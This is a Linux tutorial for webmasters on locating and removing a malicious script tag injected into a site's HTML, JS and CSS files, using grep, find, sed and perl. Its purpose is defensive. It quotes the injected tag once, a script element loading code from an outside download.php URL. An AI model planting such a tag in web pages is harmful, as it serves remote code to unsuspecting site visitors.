Linux: Remove Specific String in Text Files

Webmasters tend to get a headache when their website’s static pages (HTML, JS and CSS) are injected with malicious code. You will see an iframe or script tag in your HTML that you did not put there, and in some cases it causes your website to be classified as ‘harmful’ by Google and Firefox.

The effect is the same as an XSS attack (cross-site scripting; the X stands for ‘cross’): the attacker gets client-side script into web pages viewed by other users. Here, though, the files themselves have been modified on the server, usually because your web files are globally writable. You can find out more about this attack on Wikipedia; here I am just showing you a way to find and remove the injected scripts.
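Since globally writable files are the usual cause, it is worth checking for them. Below is a minimal sketch, not a complete hardening recipe. The scratch directory and the two sample files are my own stand-ins for /home/user1/public_html, so you can try it without touching a real site.

```shell
#!/bin/sh
# Scratch directory standing in for /home/user1/public_html (demo assumption).
webroot=$(mktemp -d)
touch "$webroot/index.html" "$webroot/style.css"
chmod 644 "$webroot/index.html"
chmod 666 "$webroot/style.css"   # made world-writable on purpose

# List regular files that any user on the system may write to.
writable=$(find "$webroot" -type f -perm -0002)
echo "$writable"

# Remove the "other" write bit from those files, then check again.
find "$webroot" -type f -perm -0002 -exec chmod o-w {} +
remaining=$(find "$webroot" -type f -perm -0002)
```

On a real server you would point find at the web directory instead of the scratch directory.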

I am using the following variables:

Infected user: user1
User’s web directory: /home/user1/public_html

1. Usually, you will receive a report that your website has been listed as harmful or as a ‘Reported Attack Site’.

2. Click ‘Why was this site blocked?’ and you will be redirected to the Google Safe Browsing page. This page tells you what malicious software is being hosted on, or injected into, your site. Let’s say that in this case the value is rysawek.cz.cc

3. Let’s identify where it appears on our web server. To do this, you need to scan your website directory. Log in via SSH/console and execute the following command:

grep -lirF "rysawek.cz.cc" /home/user1/public_html/
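To get a feel for what the scan reports, here is a small sketch you can run in a scratch directory. The sample files, including the .htaccess line, are made up for the demo. It searches the directory itself rather than a `*` glob so that hidden files are included, and uses -F so the dots in the domain are matched literally.

```shell
#!/bin/sh
# Scratch directory with made-up sample files (demo assumption).
webroot=$(mktemp -d)
mkdir "$webroot/js"
printf '<html>\n<script src=http://rysawek.cz.cc/web/fol/download.php ></script>\n</html>\n' > "$webroot/index.html"
printf 'var a = 1;\n' > "$webroot/js/app.js"
printf 'Redirect / http://rysawek.cz.cc/\n' > "$webroot/.htaccess"

# -r recurse, -l print file names only, -i ignore case, -F literal text
infected=$(grep -rliF "rysawek.cz.cc" "$webroot" | sort)
echo "$infected"

# Number of infected files found.
count=$(printf '%s\n' "$infected" | wc -l)
echo "infected files: $count"
```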

4. If you get results, the system has found files containing that string. Open one of the files in a text editor to double-check:

vi /home/user1/public_html/index.html

You will see something like below:

.....
<script src=http://rysawek.cz.cc/web/fol/download.php ></script>
.....
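If you would rather not open every file in an editor, grep can print the matching lines with their line numbers. This is only a sketch on a made-up sample page; it helps you judge whether the injected tag sits on a line of its own or shares a line with your own HTML.

```shell
#!/bin/sh
# Made-up sample page: line 2 holds only the injected tag,
# line 3 mixes it with legitimate markup.
page=$(mktemp)
printf '<html>\n<script src=http://rysawek.cz.cc/web/fol/download.php ></script>\n<p>Hello</p><script src=http://rysawek.cz.cc/web/fol/download.php ></script>\n</html>\n' > "$page"

# -n prefixes each hit with its line number; -F matches the text literally.
hits=$(grep -nF "rysawek.cz.cc" "$page")
echo "$hits"
```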

5. We need to remove that line from the files. You could do it in a text editor, file by file, but what if the scan turned up many infected files? You need a command to automate the task.

If the code sits on a line of its own, we can delete the whole line:

cd /home/user1/public_html
find . -type f -print0 | xargs -0 sed -i '/rysawek\.cz\.cc/d'
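Deleting lines in place is hard to undo, so you may want a more cautious variant. The sketch below is my own suggestion: it touches only the files that grep reports as infected and keeps each original as FILE.bak. It runs against made-up files in a scratch directory, and it assumes file names contain no newlines.

```shell
#!/bin/sh
# Scratch directory with one infected and one clean file (demo assumption).
webroot=$(mktemp -d)
printf '<html>\n<script src=http://rysawek.cz.cc/web/fol/download.php ></script>\n</html>\n' > "$webroot/index.html"
printf '<p>clean</p>\n' > "$webroot/about.html"

# Edit only files that contain the domain; -i.bak saves the original as FILE.bak.
grep -rlF "rysawek.cz.cc" "$webroot" | while IFS= read -r f; do
    sed -i.bak '/rysawek\.cz\.cc/d' "$f"
done

cleaned=$(cat "$webroot/index.html")
echo "$cleaned"
```

Once you have confirmed the site still works, the .bak files can be removed.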

If the code is embedded within a line of your own HTML (rather than on a line by itself), deleting the whole line is not advisable because it would also remove your own markup and can break the page. Instead, you can delete just the specific string with some help from Perl and a regular expression:

cd /home/user1/public_html
find . -type f -print0 | xargs -0 perl -i -pe 's/<script src=http:\/\/rysawek\.cz\.cc\/web\/fol\/download\.php ><\/script>//g'

The Perl expression above has the form s/pattern/replacement/g. Perl searches each line for the pattern between the first and second slash and replaces it with whatever sits between the second and the last slash. Since we only want to remove the string, that part is left empty. The trailing ‘g’ means global: every occurrence on a line is replaced, not just the first. Don’t forget to escape each ‘/’ in the URL as ‘\/’ so that Perl does not mistake it for a delimiter. Escaping each ‘.’ as ‘\.’ is also a good idea, since an unescaped dot matches any character.

Please share if you have a better or simpler way to do this. Cheers!
